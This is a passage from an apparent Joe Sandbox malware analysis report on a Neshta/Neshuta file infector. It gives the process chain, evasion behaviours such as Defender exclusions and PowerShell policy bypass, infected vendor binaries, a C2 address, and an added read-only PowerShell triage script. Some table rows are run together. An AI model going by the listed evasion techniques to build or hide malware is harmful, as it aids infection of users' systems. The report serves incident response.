  signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Protects its processes via BreakOnTermination flag; Drops executables to the windows directory (C:\Windows) and starts them; 3 other signatures
  starts: svchost.com (nodes 19, 23, 25, 27)

svchost.com (node 19)
  dropped: C:\Program Files (x86)\...\Uninstall.exe (PE32); C:\...\MicrosoftEdgeUpdateCore.exe (PE32); C:\...\MicrosoftEdgeUpdateBroker.exe (PE32); 48 other malicious files
  signatures: Bypasses PowerShell execution policy; Adds a directory exclusion to Windows Defender; Sample is not signed and drops a device driver; Infects executable files (exe, dll, sys, html)
  starts: powershell.exe (node 29)

svchost.com (nodes 23, 25, 27)
  start: powershell.exe (nodes 32, 34, 36)

powershell.exe (node 29)
  signatures: Loading BitLocker PowerShell Module
  starts: conhost.exe (node 38)

powershell.exe (nodes 32, 34, 36)
  start: conhost.exe (nodes 40, 42, 44)
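The behaviour graph gives the chain that matters for host triage: svchost.com dropped into C:\Windows (Windows ships svchost.exe, never a .com there), a "Java Update Checker (64 bit).exe" in ProgramData, third-party executables under Program Files (x86) rewritten and later flagged as Win32.Virus.Neshuta, a Defender exclusion added through PowerShell, and connections to 45.141.26.232. The script below is an added triage example for a host suspected of running this sample; it is not part of the Joe Sandbox report and not the malware's code. Paths and the C2 address are taken from the report. Everything else is the author's assumption about a typical Windows 10 client: the infected Google, Adobe, Oracle and Microsoft binaries are normally Authenticode-signed, so a HashMismatch on them is a strong indicator of rewriting, while NotSigned alone is weak because some legitimate tools ship unsigned; and event 4104 in the PowerShell operational log records the decoded content of an -EncodedCommand payload, but only when Script Block Logging is enabled.

```powershell
#Requires -RunAsAdministrator
# Added triage script for a host suspected of running this sample. Not part of the Joe
# Sandbox report and not the malware's code. IOC paths and the C2 address come from the
# report; the Authenticode heuristic and the 4104 search are the author's assumptions.

$iocPaths = @(
    'C:\Windows\svchost.com',                            # dropped by x.exe (node 10)
    'C:\ProgramData\Java Update Checker (64 bit).exe',   # dropped by x.exe (node 14)
    (Join-Path $env:LOCALAPPDATA 'Temp\chrome.exe'),
    (Join-Path $env:LOCALAPPDATA 'Temp\3582-490\x.exe')
)
$c2Address = '45.141.26.232'

# 1. Defender exclusions ("Adds a directory exclusion to Windows Defender").
#    Exclusion fields are hidden from non-admin callers, hence the admin requirement above.
$pref = Get-MpPreference
[pscustomobject]@{
    ExclusionPath      = ($pref.ExclusionPath      -join '; ')
    ExclusionProcess   = ($pref.ExclusionProcess   -join '; ')
    ExclusionExtension = ($pref.ExclusionExtension -join '; ')
} | Format-List

# 2. Dropped files that are present, hashed for correlation with the report.
foreach ($path in $iocPaths) {
    if (Test-Path -LiteralPath $path -PathType Leaf) {
        $sha256 = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
        Write-Warning ('IOC present: {0}  SHA256={1}' -f $path, $sha256)
    }
}

# 3. Infected third-party executables ("Infects executable files"). The sandbox flagged
#    vendor binaries under Program Files (x86) that are normally signed; a HashMismatch
#    there means the file was rewritten after signing. NotSigned alone is a weak signal.
$suspect = Get-ChildItem -LiteralPath 'C:\Program Files (x86)' -Recurse -Filter *.exe -File -ErrorAction SilentlyContinue |
    ForEach-Object {
        $sig = Get-AuthenticodeSignature -LiteralPath $_.FullName
        if ($sig.Status -ne 'Valid') {
            [pscustomobject]@{
                Path      = $_.FullName
                Status    = $sig.Status
                Signer    = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
                LastWrite = $_.LastWriteTime
            }
        }
    }
$suspect | Sort-Object LastWrite -Descending | Format-Table -AutoSize

# 4. Script blocks that touched Defender preferences. Event 4104 stores the decoded block,
#    so an encoded Add-MpPreference/Set-MpPreference call is searchable in clear text here.
#    The log is populated only if Script Block Logging is enabled on the host.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'MpPreference' } |
    Select-Object TimeCreated, @{ n = 'Block'; e = { $_.Message.Substring(0, [Math]::Min(300, $_.Message.Length)) } } |
    Format-List

# 5. Live connections to the C2 address seen in the report.
Get-NetTCPConnection -RemoteAddress $c2Address -ErrorAction SilentlyContinue |
    Select-Object LocalPort, RemotePort, State, OwningProcess,
        @{ n = 'Image'; e = { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Path } } |
    Format-Table -AutoSize
```

Run it from an elevated PowerShell on the suspect host, not from the sandbox. Step 3 is the slow part and the one that finds what the AV table below lists: every vendor binary the virus rewrote shows up with a broken signature and a fresh LastWriteTime, which gives the remediation list (restore from install media or reinstall) without relying on signature-based AV having caught each file.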

Initial Sample

Source | Detection | Scanner | Label | Link
x.exe | 97% | ReversingLabs | Win32.Virus.Neshuta | -
x.exe | 93% | Virustotal | - | Browse
x.exe | 100% | Avira | W32/Delf.I | -
x.exe | 100% | Joe Sandbox ML | - | -
Dropped Files

Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\AutoIt3\Uninstall.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Avira | W32/Delf.I | -
C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\AutoIt3\Uninstall.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 97% | ReversingLabs | Win32.Virus.Neshuta | -
C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | 94% | ReversingLabs | Win32.Virus.Neshta | -
C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | 83% | Virustotal | - | Browse
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | ReversingLabs | Win32.Virus.Neshuta | -
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 89% | Virustotal | - | Browse
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | ReversingLabs | Win32.Virus.Neshuta | -
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 90% | Virustotal | - | Browse
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | ReversingLabs | Win32.Virus.Neshuta | -
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 90% | Virustotal | - | Browse
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | ReversingLabs | Win32.Virus.Neshuta | -
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 93% | Virustotal | - | Browse
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | ReversingLabs | Win32.Virus.Neshuta | -
C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe | 100% | ReversingLabs | Win32.Virus.Neshuta | -
C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe | 89% | Virustotal | - | Browse
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | ReversingLabs | Win32.Virus.Neshuta | -
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 89% | Virustotal | - | Browse
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | ReversingLabs | Win32.Virus.Neshuta | -
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | ReversingLabs | Win32.Virus.Neshuta | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | ReversingLabs | Win32.Virus.Neshuta | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | ReversingLabs | Win32.Virus.Neshuta | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | ReversingLabs | Win32.Virus.Neshuta | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | ReversingLabs | Win32.Virus.Neshuta | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | ReversingLabs | Win32.Virus.Neshuta | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | ReversingLabs | Win32.Virus.Neshuta | -
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | ReversingLabs | Win32.Virus.Neshuta | -
Unpacked PE Files

No Antivirus matches
Domains

Source | Detection | Scanner | Label | Link
ip-api.com | 0% | Virustotal | - | Browse
URLs

Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe | -
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe | -
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe | -
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe | -
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe | -
https://contoso.com/License | 0% | URL Reputation | safe | -
https://contoso.com/License | 0% | URL Reputation | safe | -
https://contoso.com/Icon | 0% | URL Reputation | safe | -
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe | -
https://aka.ms/pscore6lB | 0% | URL Reputation | safe | -
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe | -
https://contoso.com/ | 0% | URL Reputation | safe | -
https://nuget.org/nuget.exe | 0% | URL Reputation | safe | -
http://ip-api.com | 0% | URL Reputation | safe | -
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | -
http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe | -
http://www.autoitscript.com/autoit3/J | 0% | Avira URL Cloud | safe | -
http://www.autoitscript.com/autoit3/ | 0% | Avira URL Cloud | safe | -
http://crl.m | 0% | Avira URL Cloud | safe | -
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe | -
https://www.autoitscript.com/autoit3/ | 0% | Avira URL Cloud | safe | -
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith | 0% | Avira URL Cloud | safe | -
http://crl.micro | 0% | Avira URL Cloud | safe | -
https://ion=v4.5 | 0% | Avira URL Cloud | safe | -
http://www.autoitscript.com/autoit3/J | 0% | Virustotal | - | Browse
http://127.0.0.1:13556/InsiderSlabBehaviorReportedBuildInsiderSlabBehaviorInsiderSlabBehaviorReporte | 0% | Avira URL Cloud | safe | -
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith | 0% | Virustotal | - | Browse
http://www.autoitscript.com/autoit3/ | 0% | Virustotal | - | Browse
https://www.autoitscript.com/autoit3/ | 0% | Virustotal | - | Browse
http://www.autoitscript.com/autoit3/8 | 0% | Avira URL Cloud | safe | -
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff | 0% | Avira URL Cloud | safe | -
https://github.com/Pester/Pester | 1% | Virustotal | - | Browse
45.141.26.232 | 0% | Avira URL Cloud | safe | -
http://www.autoitscript.com/autoit3/8 | 0% | Virustotal | - | Browse
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff | 0% | Virustotal | - | Browse
http://127.0.0.1:13556/InsiderSlabBehaviorReportedBuildInsiderSlabBehaviorInsiderSlabBehaviorReporte | 0% | Virustotal | - | Browse
45.141.26.232 | 3% | Virustotal | - | Browse
Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | true | - | unknown
Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
45.141.26.232 | true | 3%, Virustotal, Browse; Avira URL Cloud: safe | unknown
URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | AutoIt3_x64.exe.0.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1397308567.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1989631818.00000000059A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1999920156.0000000006137000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000004.00000002.1376757787.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1950840726.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1954269308.0000000005226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | svchost.com, 00000003.00000002.1905492456.0000000000193000.00000004.00000010.00020000.00000000.sdmp, Uninstall.exe.0.dr | false | URL Reputation: safe | unknown
http://www.autoitscript.com/autoit3/ | Aut2exe.exe.0.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://www.autoitscript.com/autoit3/ | Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe
                              unknown
                              http://crl.mpowershell.exe, 00000013.00000002.2023438315.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilithmsedge_pwa_launcher.exe.0.dr, identity_helper.exe.0.dr, pwahelper.exe.0.dr, msedge_proxy.exe.3.drfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              http://crl.micropowershell.exe, 00000013.00000002.1946659267.0000000000A0A000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.1376757787.0000000004C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1950840726.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1954269308.00000000050D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1956487745.00000000054C1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://ion=v4.5powershell.exe, 00000013.00000002.1946659267.000000000096D000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.1376757787.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1950840726.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1954269308.0000000005226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contoso.com/powershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1397308567.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1989631818.00000000059A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1999920156.0000000006137000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://ip-api.comx.exe, 00000002.00000002.2471076189.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2471076189.00000000030C2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://127.0.0.1:13556/InsiderSlabBehaviorReportedBuildInsiderSlabBehaviorInsiderSlabBehaviorReporteintegrator.exe.0.drfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.autoitscript.com/autoit3/8Aut2exe.exe.0.drfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namex.exe, 00000002.00000002.2471076189.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2471076189.0000000003001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1376757787.0000000004C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1950840726.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1954269308.00000000050D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1956487745.00000000054C1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffmsedge_pwa_launcher.exe.0.dr, identity_helper.exe.0.dr, pwahelper.exe.0.dr, msedge_proxy.exe.3.drfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States (US) | 53334 | TUT-AS | true
45.141.26.232 | unknown | Netherlands (NL) | 62068 | SPECTRAIP (SpectraIP B.V.) | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1465840
Start date and time: 2024-07-02 06:51:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: x.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.evad.winEXE@23/194@1/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 287
• Number of non-executed functions: 9
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
00:52:03 | API Interceptor | 86x Sleep call for process: powershell.exe modified
01:56:57 | API Interceptor | 62x Sleep call for process: x.exe modified
07:56:41 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update Checker (64 bit).lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | Roblox Account Manager.exe | malicious | Unknown | ip-api.com/json/
208.95.112.1 | x433.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | DriverUpdt.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | rinvoice.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | rQuotation.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | 8f5WsFcnTc.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | ZkqNrYh5cV.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | rQoutation.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | v31TgVEtHi.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | yVtOz1fD5G.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | Roblox Account Manager.exe | malicious | Unknown | 208.95.112.1
ip-api.com | x433.exe | malicious | XWorm | 208.95.112.1
ip-api.com | DriverUpdt.exe | malicious | XWorm | 208.95.112.1
ip-api.com | rinvoice.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | rQuotation.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | 8f5WsFcnTc.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | ZkqNrYh5cV.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | rQoutation.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | v31TgVEtHi.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | yVtOz1fD5G.exe | malicious | AgentTesla | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SPECTRAIP (SpectraIP B.V., NL) | oniCmGMx16.exe | malicious | Unknown | 45.144.167.158
SPECTRAIP (SpectraIP B.V., NL) | zbRmQrzaHY.dll | malicious | Wannacry | 45.139.167.2
